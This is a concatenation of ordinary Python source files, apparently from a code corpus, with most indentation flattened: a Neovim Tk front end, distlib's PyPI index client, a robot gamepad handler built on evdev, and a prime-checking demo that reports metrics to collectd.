def _tk_get_coords(self, row, col):
x = col * self._colsize
y = row * self._rowsize
return x, y
def _tk_key(self, event):
if 0xffe1 <= event.keysym_num <= 0xffee:
# this is a modifier key, ignore. Source:
# https://www.tcl.tk/man/tcl8.4/TkCmd/keysyms.htm
return
# Translate to Nvim representation of keys
send = []
if event.state & 0x1:
send.append('S')
if event.state & 0x4:
send.append('C')
if event.state & (0x8 | 0x80):
send.append('A')
special = len(send) > 0
key = event.char
if _is_invalid_key(key):
special = True
key = event.keysym
send.append(SPECIAL_KEYS.get(key, key))
send = '-'.join(send)
if special:
send = '<' + send + '>'
nvim = self._nvim
nvim.session.threadsafe_call(lambda: nvim.input(send))
def _nvim_event_loop(self):
self._nvim.session.run(self._nvim_request,
self._nvim_notification,
lambda: self._nvim.attach_ui(80, 24))
self._root.event_generate('<<nvim_detach>>', when='tail')
def _nvim_request(self, method, args):
raise Exception('This UI does not implement any methods')
def _nvim_notification(self, method, args):
if method == 'redraw':
self._nvim_updates.append(args)
self._root.event_generate('<<nvim_redraw>>', when='tail')
def _is_invalid_key(c):
try:
return len(c.decode('utf-8')) != 1 or ord(c[0]) < 0x20
except UnicodeDecodeError:
return True
nvim = attach('child', argv=['../neovim/build/bin/nvim', '--embed'])
ui = NvimTk(nvim)
# pr = cProfile.Profile()
# pr.enable()
ui.run()
# pr.disable()
# s = StringIO.StringIO()
# ps = pstats.Stats(pr, stream=s)
# ps.strip_dirs().sort_stats('ncalls').print_stats(15)
# print s.getvalue()
|
index.py
|
# -*- coding: utf-8 -*-
#
# Copyright (C) 2013 Vinay Sajip.
# Licensed to the Python Software Foundation under a contributor agreement.
# See LICENSE.txt and CONTRIBUTORS.txt.
#
import hashlib
import logging
import os
import shutil
import subprocess
import tempfile
try:
from threading import Thread
except ImportError:
from dummy_threading import Thread
from . import DistlibException
from .compat import (HTTPBasicAuthHandler, Request, HTTPPasswordMgr,
urlparse, build_opener, string_types)
from .util import cached_property, zip_dir, ServerProxy
logger = logging.getLogger(__name__)
logger.disabled = True
DEFAULT_INDEX = 'https://pypi.org/pypi'
DEFAULT_REALM = 'pypi'
class PackageIndex(object):
"""
This class represents a package index compatible with PyPI, the Python
Package Index.
"""
boundary = b'----------ThIs_Is_tHe_distlib_index_bouNdaRY_$'
def __init__(self, url=None):
"""
Initialise an instance.
:param url: The URL of the index. If not specified, the URL for PyPI is
used.
"""
self.url = url or DEFAULT_INDEX
self.read_configuration()
scheme, netloc, path, params, query, frag = urlparse(self.url)
if params or query or frag or scheme not in ('http', 'https'):
raise DistlibException('invalid repository: %s' % self.url)
self.password_handler = None
self.ssl_verifier = None
self.gpg = None
self.gpg_home = None
with open(os.devnull, 'w') as sink:
# Use gpg by default rather than gpg2, as gpg2 insists on
# prompting for passwords
for s in ('gpg', 'gpg2'):
try:
rc = subprocess.check_call([s, '--version'], stdout=sink,
stderr=sink)
if rc == 0:
self.gpg = s
break
except OSError:
pass
def _get_pypirc_command(self):
"""
Get the distutils command for interacting with PyPI configurations.
:return: the command.
"""
from distutils.core import Distribution
from distutils.config import PyPIRCCommand
d = Distribution()
return PyPIRCCommand(d)
def read_configuration(self):
"""
Read the PyPI access configuration as supported by distutils, getting
PyPI to do the actual work. This populates ``username``, ``password``,
``realm`` and ``url`` attributes from the configuration.
"""
# get distutils to do the work
c = self._get_pypirc_command()
c.repository = self.url
cfg = c._read_pypirc()
self.username = cfg.get('username')
self.password = cfg.get('password')
self.realm = cfg.get('realm', 'pypi')
self.url = cfg.get('repository', self.url)
def save_configuration(self):
"""
Save the PyPI access configuration. You must have set ``username`` and
``password`` attributes before calling this method.
Again, distutils is used to do the actual work.
"""
self.check_credentials()
# get distutils to do the work
c = self._get_pypirc_command()
c._store_pypirc(self.username, self.password)
def check_credentials(self):
"""
Check that ``username`` and ``password`` have been set, and raise an
exception if not.
"""
if self.username is None or self.password is None:
raise DistlibException('username and password must be set')
pm = HTTPPasswordMgr()
_, netloc, _, _, _, _ = urlparse(self.url)
pm.add_password(self.realm, netloc, self.username, self.password)
self.password_handler = HTTPBasicAuthHandler(pm)
def register(self, metadata):
"""
Register a distribution on PyPI, using the provided metadata.
:param metadata: A :class:`Metadata` instance defining at least a name
and version number for the distribution to be
registered.
:return: The HTTP response received from PyPI upon submission of the
request.
"""
self.check_credentials()
metadata.validate()
d = metadata.todict()
d[':action'] = 'verify'
request = self.encode_request(d.items(), [])
response = self.send_request(request)
d[':action'] = 'submit'
request = self.encode_request(d.items(), [])
return self.send_request(request)
def _reader(self, name, stream, outbuf):
"""
        Thread runner for reading lines from a subprocess into a buffer.
:param name: The logical name of the stream (used for logging only).
        :param stream: The stream to read from. This will typically be a pipe
                       connected to the output stream of a subprocess.
:param outbuf: The list to append the read lines to.
"""
while True:
s = stream.readline()
if not s:
break
s = s.decode('utf-8').rstrip()
outbuf.append(s)
logger.debug('%s: %s' % (name, s))
stream.close()
def get_sign_command(self, filename, signer, sign_password,
keystore=None):
"""
Return a suitable command for signing a file.
:param filename: The pathname to the file to be signed.
:param signer: The identifier of the signer of the file.
:param sign_password: The passphrase for the signer's
private key used for signing.
:param keystore: The path to a directory which contains the keys
used in verification. If not specified, the
instance's ``gpg_home`` attribute is used instead.
:return: The signing command as a list suitable to be
passed to :class:`subprocess.Popen`.
"""
cmd = [self.gpg, '--status-fd', '2', '--no-tty']
if keystore is None:
keystore = self.gpg_home
if keystore:
cmd.extend(['--homedir', keystore])
if sign_password is not None:
cmd.extend(['--batch', '--passphrase-fd', '0'])
td = tempfile.mkdtemp()
sf = os.path.join(td, os.path.basename(filename) + '.asc')
cmd.extend(['--detach-sign', '--armor', '--local-user',
signer, '--output', sf, filename])
logger.debug('invoking: %s', ' '.join(cmd))
return cmd, sf
def run_command(self, cmd, input_data=None):
"""
        Run a command in a child process, passing it any input data specified.
:param cmd: The command to run.
:param input_data: If specified, this must be a byte string containing
data to be sent to the child process.
:return: A tuple consisting of the subprocess' exit code, a list of
lines read from the subprocess' ``stdout``, and a list of
lines read from the subprocess' ``stderr``.
"""
kwargs = {
'stdout': subprocess.PIPE,
'stderr': subprocess.PIPE,
}
if input_data is not None:
kwargs['stdin'] = subprocess.PIPE
stdout = []
stderr = []
p = subprocess.Popen(cmd, **kwargs)
# We don't use communicate() here because we may need to
# get clever with interacting with the command
t1 = Thread(target=self._reader, args=('stdout', p.stdout, stdout))
t1.start()
t2 = Thread(target=self._reader, args=('stderr', p.stderr, stderr))
t2.start()
if input_data is not None:
p.stdin.write(input_data)
p.stdin.close()
p.wait()
t1.join()
t2.join()
return p.returncode, stdout, stderr
def sign_file(self, filename, signer, sign_password, keystore=None):
"""
Sign a file.
:param filename: The pathname to the file to be signed.
:param signer: The identifier of the signer of the file.
:param sign_password: The passphrase for the signer's
private key used for signing.
:param keystore: The path to a directory which contains the keys
used in signing. If not specified, the instance's
``gpg_home`` attribute is used instead.
:return: The absolute pathname of the file where the signature is
stored.
"""
cmd, sig_file = self.get_sign_command(filename, signer, sign_password,
keystore)
rc, stdout, stderr = self.run_command(cmd,
sign_password.encode('utf-8'))
if rc != 0:
raise DistlibException('sign command failed with error '
'code %s' % rc)
return sig_file
def upload_file(self, metadata, filename, signer=None, sign_password=None,
filetype='sdist', pyversion='source', keystore=None):
"""
Upload a release file to the index.
:param metadata: A :class:`Metadata` instance defining at least a name
and version number for the file to be uploaded.
:param filename: The pathname of the file to be uploaded.
:param signer: The identifier of the signer of the file.
:param sign_password: The passphrase for the signer's
private key used for signing.
:param filetype: The type of the file being uploaded. This is the
distutils command which produced that file, e.g.
``sdist`` or ``bdist_wheel``.
:param pyversion: The version of Python which the release relates
to. For code compatible with any Python, this would
be ``source``, otherwise it would be e.g. ``3.2``.
:param keystore: The path to a directory which contains the keys
used in signing. If not specified, the instance's
``gpg_home`` attribute is used instead.
:return: The HTTP response received from PyPI upon submission of the
request.
"""
self.check_credentials()
if not os.path.exists(filename):
raise DistlibException('not found: %s' % filename)
metadata.validate()
d = metadata.todict()
sig_file = None
if signer:
if not self.gpg:
logger.warning('no signing program available - not signed')
else:
sig_file = self.sign_file(filename, signer, sign_password,
keystore)
with open(filename, 'rb') as f:
file_data = f.read()
md5_digest = hashlib.md5(file_data).hexdigest()
sha256_digest = hashlib.sha256(file_data).hexdigest()
d.update({
':action': 'file_upload',
'protocol_version': '1',
'filetype': filetype,
'pyversion': pyversion,
'md5_digest': md5_digest,
'sha256_digest': sha256_digest,
})
files = [('content', os.path.basename(filename), file_data)]
if sig_file:
with open(sig_file, 'rb') as f:
sig_data = f.read()
files.append(('gpg_signature', os.path.basename(sig_file),
sig_data))
shutil.rmtree(os.path.dirname(sig_file))
request = self.encode_request(d.items(), files)
return self.send_request(request)
def upload_documentation(self, metadata, doc_dir):
"""
Upload documentation to the index.
:param metadata: A :class:`Metadata` instance defining at least a name
and version number for the documentation to be
uploaded.
:param doc_dir: The pathname of the directory which contains the
documentation. This should be the directory that
contains the ``index.html`` for the documentation.
:return: The HTTP response received from PyPI upon submission of the
request.
"""
self.check_credentials()
if not os.path.isdir(doc_dir):
raise DistlibException('not a directory: %r' % doc_dir)
fn = os.path.join(doc_dir, 'index.html')
if not os.path.exists(fn):
raise DistlibException('not found: %r' % fn)
metadata.validate()
name, version = metadata.name, metadata.version
zip_data = zip_dir(doc_dir).getvalue()
fields = [(':action', 'doc_upload'),
('name', name), ('version', version)]
files = [('content', name, zip_data)]
request = self.encode_request(fields, files)
return self.send_request(request)
def get_verify_command(self, signature_filename, data_filename,
keystore=None):
"""
Return a suitable command for verifying a file.
:param signature_filename: The pathname to the file containing the
signature.
:param data_filename: The pathname to the file containing the
signed data.
:param keystore: The path to a directory which contains the keys
used in verification. If not specified, the
instance's ``gpg_home`` attribute is used instead.
:return: The verifying command as a list suitable to be
passed to :class:`subprocess.Popen`.
"""
cmd = [self.gpg, '--status-fd', '2', '--no-tty']
if keystore is None:
keystore = self.gpg_home
if keystore:
cmd.extend(['--homedir', keystore])
cmd.extend(['--verify', signature_filename, data_filename])
logger.debug('invoking: %s', ' '.join(cmd))
return cmd
def verify_signature(self, signature_filename, data_filename,
keystore=None):
"""
Verify a signature for a file.
:param signature_filename: The pathname to the file containing the
signature.
:param data_filename: The pathname to the file containing the
signed data.
:param keystore: The path to a directory which contains the keys
used in verification. If not specified, the
instance's ``gpg_home`` attribute is used instead.
:return: True if the signature was verified, else False.
"""
if not self.gpg:
raise DistlibException('verification unavailable because gpg '
'unavailable')
cmd = self.get_verify_command(signature_filename, data_filename,
keystore)
rc, stdout, stderr = self.run_command(cmd)
if rc not in (0, 1):
raise DistlibException('verify command failed with error '
'code %s' % rc)
return rc == 0
def download_file(self, url, destfile, digest=None, reporthook=None):
"""
This is a convenience method for downloading a file from an URL.
Normally, this will be a file from the index, though currently
no check is made for this (i.e. a file can be downloaded from
anywhere).
The method is just like the :func:`urlretrieve` function in the
standard library, except that it allows digest computation to be
done during download and checking that the downloaded data
matched any expected value.
:param url: The URL of the file to be downloaded (assumed to be
available via an HTTP GET request).
:param destfile: The pathname where the downloaded file is to be
saved.
:param digest: If specified, this must be a (hasher, value)
tuple, where hasher is the algorithm used (e.g.
``'md5'``) and ``value`` is the expected value.
:param reporthook: The same as for :func:`urlretrieve` in the
standard library.
"""
if digest is None:
digester = None
logger.debug('No digest specified')
else:
if isinstance(digest, (list, tuple)):
hasher, digest = digest
else:
hasher = 'md5'
digester = getattr(hashlib, hasher)()
logger.debug('Digest specified: %s' % digest)
# The following code is equivalent to urlretrieve.
# We need to do it this way so that we can compute the
# digest of the file as we go.
with open(destfile, 'wb') as dfp:
# addinfourl is not a context manager on 2.x
# so we have to use try/finally
sfp = self.send_request(Request(url))
try:
headers = sfp.info()
blocksize = 8192
size = -1
read = 0
blocknum = 0
if "content-length" in headers:
size = int(headers["Content-Length"])
if reporthook:
reporthook(blocknum, blocksize, size)
while True:
block = sfp.read(blocksize)
if not block:
break
read += len(block)
dfp.write(block)
if digester:
digester.update(block)
blocknum += 1
if reporthook:
reporthook(blocknum, blocksize, size)
finally:
sfp.close()
# check that we got the whole file, if we can
if size >= 0 and read < size:
raise DistlibException(
'retrieval incomplete: got only %d out of %d bytes'
% (read, size))
# if we have a digest, it must match.
if digester:
actual = digester.hexdigest()
if digest != actual:
raise DistlibException('%s digest mismatch for %s: expected '
'%s, got %s' % (hasher, destfile,
digest, actual))
logger.debug('Digest verified: %s', digest)
def send_request(self, req):
"""
Send a standard library :class:`Request` to PyPI and return its
response.
:param req: The request to send.
:return: The HTTP response from PyPI (a standard library HTTPResponse).
"""
handlers = []
if self.password_handler:
handlers.append(self.password_handler)
if self.ssl_verifier:
handlers.append(self.ssl_verifier)
opener = build_opener(*handlers)
return opener.open(req)
def encode_request(self, fields, files):
"""
Encode fields and files for posting to an HTTP server.
:param fields: The fields to send as a list of (fieldname, value)
tuples.
:param files: The files to send as a list of (fieldname, filename,
file_bytes) tuple.
"""
# Adapted from packaging, which in turn was adapted from
# http://code.activestate.com/recipes/146306
parts = []
boundary = self.boundary
for k, values in fields:
if not isinstance(values, (list, tuple)):
values = [values]
for v in values:
parts.extend((
b'--' + boundary,
('Content-Disposition: form-data; name="%s"' %
k).encode('utf-8'),
b'',
v.encode('utf-8')))
for key, filename, value in files:
parts.extend((
b'--' + boundary,
('Content-Disposition: form-data; name="%s"; filename="%s"' %
(key, filename)).encode('utf-8'),
b'',
value))
parts.extend((b'--' + boundary + b'--', b''))
body = b'\r\n'.join(parts)
ct = b'multipart/form-data; boundary=' + boundary
headers = {
'Content-type': ct,
'Content-length': str(len(body))
}
return Request(self.url, body, headers)
def search(self, terms, operator=None):
if isinstance(terms, string_types):
terms = {'name': terms}
rpc_proxy = ServerProxy(self.url, timeout=3.0)
try:
return rpc_proxy.search(terms, operator or 'and')
finally:
rpc_proxy('close')()
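# A minimal usage sketch (illustrative only; URL and digest are placeholders):
#
#     index = PackageIndex()            # defaults to DEFAULT_INDEX
#     index.download_file('https://example.invalid/pkg-1.0.tar.gz',
#                         '/tmp/pkg-1.0.tar.gz',
#                         digest=('sha256', 'expected-hex-digest'))
#
# The digest argument is the (hasher, value) tuple described in download_file();
# uploading additionally requires username/password to be set
# (see check_credentials()).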
|
gamepad.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Copyright 2020-2021 by Murray Altheim. All rights reserved. This file is part
# of the Robot Operating System project, released under the MIT License. Please
# see the LICENSE file included as part of this package.
#
# author: Murray Altheim
# created: 2020-08-05
# modified: 2020-08-06
#
# This class interprets the signals arriving from the 8BitDo N30 Pro gamepad,
# a paired Bluetooth device. Note that supporting classes are found at the
# bottom of this file.
#
import os, sys, time
from threading import Thread
import datetime as dt
from enum import Enum
from evdev import InputDevice, ecodes
from colorama import init, Fore, Style
init()
from lib.logger import Logger, Level
from lib.event import Event
from lib.rate import Rate
'''
Pairing and using a bluetooth gamepad device:
1. prior to pairing your gamepad, list the current devices using:
% ls /dev/input
2. connect and pair the gamepad, then repeat the previous command. You'll
notice a new device, e.g., "/dev/input/event6". This is likely your
gamepad. You may need to check which of the devices was most recently
changed to determine this, it isn't always the highest number.
3. set the value of gamepad:device_path in the config.yaml file to the
value of your gamepad device.
4. be sure your gamepad is paired prior to starting ros.
If everything seems all wired up but you're not getting a response from
your gamepad, you may have configured a connection to the wrong device.
This class is based on information found at:
https://core-electronics.com.au/tutorials/using-usb-and-bluetooth-controllers-with-python.html
'''
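# For reference, a minimal (hypothetical) config.yaml stanza matching the keys
# read in __init__() below might look like this - values are illustrative only:
#
#   ros:
#     gamepad:
#       device_path: /dev/input/event6   # the device found in step 2 above
#       loop_freq_hz: 20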
# ..............................................................................
class Gamepad():
_NOT_AVAILABLE_ERROR = 'gamepad device not found (not configured, paired, powered or otherwise available)'
def __init__(self, config, message_bus, message_factory, level):
'''
Parameters:
config: the YAML-based application configuration
message_bus: the message bus to receive messages from this task
message_factory: the factory for creating messages
            level:           the log level used by this class's Logger
'''
if config is None:
raise ValueError('no configuration provided.')
self._level = level
self._log = Logger("gamepad", level)
self._log.info('initialising...')
self._config = config
_config = config['ros'].get('gamepad')
# config
_loop_freq_hz = _config.get('loop_freq_hz')
self._rate = Rate(_loop_freq_hz)
self._device_path = _config.get('device_path')
self._message_bus = message_bus
self._message_factory = message_factory
self._gamepad_closed = False
self._closed = False
self._enabled = False
self._thread = None
self._gamepad = None
# ..........................................................................
def connect(self):
'''
Scan for likely gamepad device, and if found, connect.
Otherwise we raise an OSError.
'''
_scan = GamepadScan(self._config, self._level)
_matches = _scan.check_gamepad_device()
if not _matches:
self._log.warning('no connection attempted: gamepad is not the most recent device (configured at: {}).'.format(self._device_path ))
raise OSError('no gamepad available.')
else:
self._connect()
# ..........................................................................
def has_connection(self):
return self._gamepad != None
# ..........................................................................
def _connect(self):
self._log.heading('gamepad','Connecting Gamepad...',None)
try:
self._gamepad = InputDevice(self._device_path)
# display device info
self._log.info(Fore.GREEN + "gamepad: {}".format(self._gamepad))
self._log.info('connected.')
except Exception as e:
self._enabled = False
self._gamepad = None
raise GamepadConnectException('unable to connect to input device path {}: {}'.format(self._device_path, e))
# ..........................................................................
def enable(self):
if not self._closed:
self._log.info('enabled gamepad.')
if not self.in_loop():
self._enabled = True
self._start_gamepad_loop()
else:
self._log.error('cannot start gamepad.')
self._enabled = False
else:
self._log.warning('cannot enable gamepad: already closed.')
self._enabled = False
# ..........................................................................
def in_loop(self):
'''
Returns true if the main loop is active (the thread is alive).
'''
return self._thread != None and self._thread.is_alive()
# ......................................................
@staticmethod
def convert_range(value):
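        # Map a raw 0-255 axis value onto roughly [-1.0, 1.0], centred on 127;
        # the sign is inverted, so larger raw values produce more negative output.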
return ( (value - 127.0) / 255.0 ) * -2.0
# ..........................................................................
def _gamepad_loop(self, f_is_enabled):
self._log.info('starting event loop...')
__enabled = True
while __enabled and f_is_enabled():
try:
if self._gamepad is None:
raise Exception(Gamepad._NOT_AVAILABLE_ERROR + ' [gamepad no longer available]')
# loop and filter by event code and print the mapped label
for event in self._gamepad.read_loop():
self._handleEvent(event)
if not f_is_enabled():
self._log.info(Fore.BLACK + 'breaking from event loop.')
break
except Exception as e:
self._log.error('gamepad device error: {}'.format(e))
except OSError as e:
self._log.error(Gamepad._NOT_AVAILABLE_ERROR + ' [lost connection to gamepad]')
finally:
'''
Note that closing the InputDevice is a bit tricky, and we're currently
masking an exception that's always thrown. As there is no data loss on
a gamepad event loop being closed suddenly this is not an issue.
'''
try:
self._log.info('closing gamepad device...')
self._gamepad.close()
self._log.info(Fore.YELLOW + 'gamepad device closed.')
except Exception as e:
self._log.debug('error closing gamepad device: {}'.format(e))
finally:
__enabled = False
self._gamepad_closed = True
self._rate.wait()
self._log.info('exited event loop.')
# ..........................................................................
@property
def enabled(self):
return self._enabled
# ..........................................................................
def _start_gamepad_loop(self):
'''
This is the method to call to actually start the loop.
'''
if not self._enabled:
self._log.error('attempt to start gamepad event loop while disabled.')
elif self._gamepad is None:
self._log.error(Gamepad._NOT_AVAILABLE_ERROR + ' [no gamepad found]')
sys.exit(3)
elif not self._closed:
if self._thread is None:
self._enabled = True
self._thread = Thread(name='gamepad', target=Gamepad._gamepad_loop, args=[self, lambda: self._enabled], daemon=True)
# self._thread.setDaemon(False)
self._thread.start()
self._log.info('started.')
else:
self._log.warning('cannot enable: process already running.')
else:
self._log.warning('cannot enable: already closed.')
# ..........................................................................
def disable(self):
if self._closed:
self._log.warning('can\'t disable: already closed.')
elif not self._enabled:
self._log.debug('already disabled.')
else:
self._enabled = False
# we'll wait a bit for the gamepad device to close...
time.sleep(2.0)
# _i = 0
# while not self._gamepad_closed and _i < 20:
# _i += 1
# self._log.debug('_i: {:d}'.format(_i))
# time.sleep(0.1)
self._log.info('disabled.')
# ..........................................................................
def close(self):
'''
Permanently close and disable the gamepad.
'''
if self._enabled:
self.disable()
if not self._closed:
self._closed = True
self._log.info('closed.')
else:
self._log.debug('already closed.')
# ..........................................................................
def _handleEvent(self, event):
'''
Handles the incoming event by filtering on event type and code.
There's possibly a more elegant way of doing this but for now this
works just fine.
'''
_message = None
_control = None
if event.type == ecodes.EV_KEY:
_control = GamepadControl.get_by_code(self, event.code)
if event.value == 1:
if event.code == GamepadControl.A_BUTTON.code:
self._log.info(Fore.RED + "A Button")
# _control = GamepadControl.A_BUTTON
elif event.code == GamepadControl.B_BUTTON.code:
self._log.info(Fore.RED + "B Button")
# _control = GamepadControl.B_BUTTON
elif event.code == GamepadControl.X_BUTTON.code:
self._log.info(Fore.RED + "X Button")
# _control = GamepadControl.X_BUTTON
elif event.code == GamepadControl.Y_BUTTON.code:
self._log.info(Fore.RED + "Y Button")
# _control = GamepadControl.Y_BUTTON
elif event.code == GamepadControl.L1_BUTTON.code:
self._log.info(Fore.YELLOW + "L1 Button")
# _control = GamepadControl.L1_BUTTON
elif event.code == GamepadControl.L2_BUTTON.code:
self._log.info(Fore.YELLOW + "L2 Button")
# _control = GamepadControl.L2_BUTTON
elif event.code == GamepadControl.R1_BUTTON.code:
self._log.info(Fore.YELLOW + "R1 Button")
# _control = GamepadControl.R1_BUTTON
elif event.code == GamepadControl.R2_BUTTON.code:
self._log.info(Fore.YELLOW + "R2 Button")
# _control = GamepadControl.R2_BUTTON
elif event.code == GamepadControl.START_BUTTON.code:
self._log.info(Fore.GREEN + "Start Button")
# _control = GamepadControl.START_BUTTON
elif event.code == GamepadControl.SELECT_BUTTON.code:
self._log.info(Fore.GREEN + "Select Button")
# _control = GamepadControl.SELECT_BUTTON
elif event.code == GamepadControl.HOME_BUTTON.code:
self._log.info(Fore.MAGENTA + "Home Button")
# _control = GamepadControl.HOME_BUTTON
else:
self._log.info(Fore.BLACK + "event type: EV_KEY; event: {}; value: {}".format(event.code, event.value))
else:
# self._log.info(Fore.BLACK + Style.DIM + "event type: EV_KEY; value: {}".format(event.value))
pass
elif event.type == ecodes.EV_ABS:
_control = GamepadControl.get_by_code(self, event.code)
if event.code == GamepadControl.DPAD_HORIZONTAL.code:
if event.value == 1:
self._log.info(Fore.CYAN + Style.BRIGHT + "D-Pad Horizontal(Right) {}".format(event.value))
elif event.value == -1:
self._log.info(Fore.CYAN + Style.NORMAL + "D-Pad Horizontal(Left) {}".format(event.value))
else:
self._log.info(Fore.BLACK + "D-Pad Horizontal(N) {}".format(event.value))
elif event.code == GamepadControl.DPAD_VERTICAL.code:
if event.value == -1:
self._log.info(Fore.CYAN + Style.NORMAL + "D-Pad Vertical(Up) {}".format(event.value))
elif event.value == 1:
self._log.info(Fore.CYAN + Style.BRIGHT + "D-Pad Vertical(Down) {}".format(event.value))
else:
self._log.info(Fore.BLACK + "D-Pad Vertical(N) {}".format(event.value))
elif event.code == GamepadControl.L3_VERTICAL.code:
self._log.debug(Fore.MAGENTA + "L3 Vertical {}".format(event.value))
elif event.code == GamepadControl.L3_HORIZONTAL.code:
self._log.debug(Fore.YELLOW + "L3 Horizontal {}".format(event.value))
elif event.code == GamepadControl.R3_VERTICAL.code:
self._log.debug(Fore.GREEN + "R3 Vertical {}".format(event.value))
# _control = GamepadControl.R3_VERTICAL
elif event.code == GamepadControl.R3_HORIZONTAL.code:
self._log.debug(Fore.GREEN + "R3 Horizontal {}".format(event.value))
# _control = GamepadControl.R3_HORIZONTAL
else:
# self._log.info(Fore.BLACK + "type: EV_ABS; event code: {}; value: {}".format(event.code, event.value))
pass
else:
# self._log.info(Fore.BLACK + Style.DIM + "ZZ. event type: {}; code: {}; value: {}".format(event.type, event.code, event.value))
pass
if _control != None:
_message = self._message_factory.get_message(_control.event, event.value)
self._log.debug(Fore.CYAN + Style.BRIGHT + "triggered control with message {}".format(_message))
self._message_bus.add(_message)
# ..............................................................................
class GamepadControl(Enum):
'''
An enumeration of the controls available on the 8BitDo N30 Pro Gamepad,
or any similar/compatible model. The numeric values for 'code' may need
to be modified for different devices, but the basic functionality of this
Enum should hold.
This also includes an Event variable, which provides the mapping between
a specific gamepad control and its corresponding action.
The @property annotations make sure the respective variable is read-only.
    control  num  code  name  description  event
'''
A_BUTTON = ( 1, 304, 'cross', 'A (Cross) Button', Event.SNIFF)
B_BUTTON = ( 2, 305, 'circle', 'B (Circle) Button', Event.STOP)
X_BUTTON = ( 3, 307, 'triangle', 'X (Triangle) Button', Event.ROAM)
    Y_BUTTON = ( 4, 308, 'square', 'Y (Square) Button', Event.BRAKE)
L1_BUTTON = ( 5, 310, 'l1', 'L1 Video', Event.VIDEO)
L2_BUTTON = ( 6, 312, 'l2', 'L2 Event', Event.EVENT_L2) # unassigned
R1_BUTTON = ( 8, 311, 'r1', 'R1 Lights On', Event.EVENT_R1) # unassigned
R2_BUTTON = ( 7, 313, 'r2', 'R2 Lights Off', Event.LIGHTS)
# L1_BUTTON = ( 5, 310, 'l1', 'L1 Button', Event.BUMPER_PORT)
# L2_BUTTON = ( 6, 312, 'l2', 'L2 Button', Event.BUMPER_CNTR)
# R2_BUTTON = ( 7, 313, 'r2', 'R2 Button', Event.BUMPER_CNTR)
# R1_BUTTON = ( 8, 311, 'r1', 'R1 Button', Event.BUMPER_STBD)
START_BUTTON = ( 9, 315, 'start', 'Start Button', Event.NO_ACTION)
SELECT_BUTTON = ( 10, 314, 'select', 'Select Button', Event.STANDBY)
HOME_BUTTON = ( 11, 306, 'home', 'Home Button', Event.SHUTDOWN)
DPAD_HORIZONTAL = ( 12, 16, 'dph', 'D-PAD Horizontal', Event.THETA)
DPAD_VERTICAL = ( 13, 17, 'dpv', 'D-PAD Vertical', Event.FORWARD_VELOCITY)
L3_VERTICAL = ( 14, 1, 'l3v', 'L3 Vertical', Event.PORT_VELOCITY)
L3_HORIZONTAL = ( 15, 0, 'l3h', 'L3 Horizontal', Event.PORT_THETA)
R3_VERTICAL = ( 16, 5, 'r3v', 'R3 Vertical', Event.STBD_VELOCITY)
R3_HORIZONTAL = ( 17, 2, 'r3h', 'R3 Horizontal', Event.STBD_THETA)
# ignore the first param since it's already set by __new__
def __init__(self, num, code, name, label, event):
self._code = code
self._name = name
self._label = label
self._event = event
@property
def code(self):
return self._code
@property
def name(self):
return self._name
@property
def label(self):
return self._label
@property
def event(self):
return self._event
# ..........................................................................
@staticmethod
def get_by_code(self, code):
for ctrl in GamepadControl:
if ctrl.code == code:
# print(Fore.WHITE + Style.BRIGHT + 'ctrl code: {}'.format(code) + Style.RESET_ALL)
return ctrl
return None
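# ..............................................................................
# The 'code' values in GamepadControl were captured from an 8BitDo N30 Pro;
# other gamepads will likely report different codes. The helper below is an
# illustrative sketch (not part of the original API) showing how to dump a
# device's event types and codes with python-evdev so the enum can be adjusted.
# The default device path is an assumption -- change it to match your system.
def dump_event_codes(device_path='/dev/input/event0'):
    '''
    Prints the event capabilities (types and codes) reported by the device at
    the given path; useful when remapping the GamepadControl codes above.
    '''
    from evdev import InputDevice
    _device = InputDevice(device_path)
    for _event_type, _codes in _device.capabilities(verbose=True).items():
        print('{}: {}'.format(_event_type, _codes))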
# ..............................................................................
class GamepadScan(object):
'''
    Returns the device with the most recently changed status from /dev/input/event{n}.
    This can help you figure out which device is your gamepad, if it was connected
    after everything else in the system had settled.
'''
def __init__(self, config, level):
self._log = Logger("gamepad-scan", level)
if config is None:
raise ValueError("no configuration provided.")
_config = config['ros'].get('gamepad')
self._device_path = _config.get('device_path')
self._log.debug('device path: {}'.format(self._device_path))
self._log.info('ready')
# ..........................................................................
def _get_ctime(self, path):
try:
_device_stat = os.stat(path)
return _device_stat.st_ctime
except OSError:
return -1.0
# ..........................................................................
def get_latest_device(self):
'''
Build a dictionary of available devices, return the one with the
most recent status change.
'''
_dict = {}
for i in range(10):
_path = '/dev/input/event{}'.format(i)
try:
_device_stat = os.stat(_path)
_ctime = _device_stat.st_ctime
except OSError:
break
self._log.debug('device: {}'.format(_path) + Fore.BLUE + Style.NORMAL + '\tstatus changed: {}'.format(dt.datetime.fromtimestamp(_ctime)))
_dict[_path] = _ctime
# find most recent by sorting the dictionary on ctime
        _sorted = sorted(_dict.items(), key=lambda x: x[1])
        _latest_device = _sorted[-1][0]
self._log.info('device path: {}'.format(self._device_path))
self._log.info('most recent device: {}'.format(_latest_device))
return _latest_device
# ..........................................................................
def check_gamepad_device(self):
'''
Checks that the configured device matches the device with the most
recently changed status, returning True if matched.
'''
_latest_device = self.get_latest_device()
if self._device_path == _latest_device:
self._log.info(Style.BRIGHT + 'matches: {}'.format(self._device_path))
return True
else:
self._log.info(Style.BRIGHT + 'does not match: {}'.format(_latest_device))
return False
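# A usage sketch for GamepadScan (illustrative only): the config dict and the
# log 'level' argument below are assumptions standing in for the application's
# real configuration and Logger level.
#
#   _config = {'ros': {'gamepad': {'device_path': '/dev/input/event5'}}}
#   _scan = GamepadScan(_config, level)
#   if not _scan.check_gamepad_device():
#       print('gamepad is more likely at: {}'.format(_scan.get_latest_device()))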
# ..............................................................................
class GamepadConnectException(Exception):
'''
Exception raised when unable to connect to Gamepad.
'''
pass
# EOF
|
primes.py
|
import time
from Queue import Queue
from threading import Thread
from random import normalvariate
import collectd
numbers = Queue()
conn = collectd.Connection()
def is_prime(n):
for i in xrange(2, n):
if n % i == 0:
return False
return True
def watch_queue():
while True:
conn.queue.set_exact(size = numbers.qsize())
time.sleep(1)
def consumer():
while True:
n = numbers.get()
before = time.time()
primality = is_prime(n)
elapsed = time.time() - before
if primality:
print n, "is prime"
conn.consumer.record("prime", count = 1, time = elapsed)
else:
print n, "is not prime"
conn.consumer.record("composite", count = 1, time = elapsed)
def producer():
while True:
n = int((time.time() % 30) ** normalvariate(5, 2))
if n < 2:
conn.producer.record(too_small = 1)
elif n > 10 ** 9:
conn.producer.record(too_big = 1)
else:
conn.producer.record(just_right = 1)
numbers.put(n)
time.sleep(0.33)
if __name__ == "__main__":
collectd.start_threads()
